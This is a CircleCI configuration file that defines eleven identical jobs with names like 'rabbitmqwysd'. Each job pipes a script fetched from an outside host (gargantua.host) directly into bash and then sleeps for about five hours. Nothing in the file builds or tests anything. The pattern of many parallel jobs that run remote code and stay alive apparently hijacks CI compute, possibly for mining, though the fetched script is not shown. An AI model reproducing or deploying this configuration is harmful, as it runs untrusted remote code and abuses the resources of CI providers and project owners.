version: 2.1

jobs:
  rabbitmqwysd:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  rabbitmqwysd10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - rabbitmqwysd
      - rabbitmqwysd1
      - rabbitmqwysd2
      - rabbitmqwysd3
      - rabbitmqwysd4
      - rabbitmqwysd5
      - rabbitmqwysd6
      - rabbitmqwysd7
      - rabbitmqwysd8
      - rabbitmqwysd9
      - rabbitmqwysd10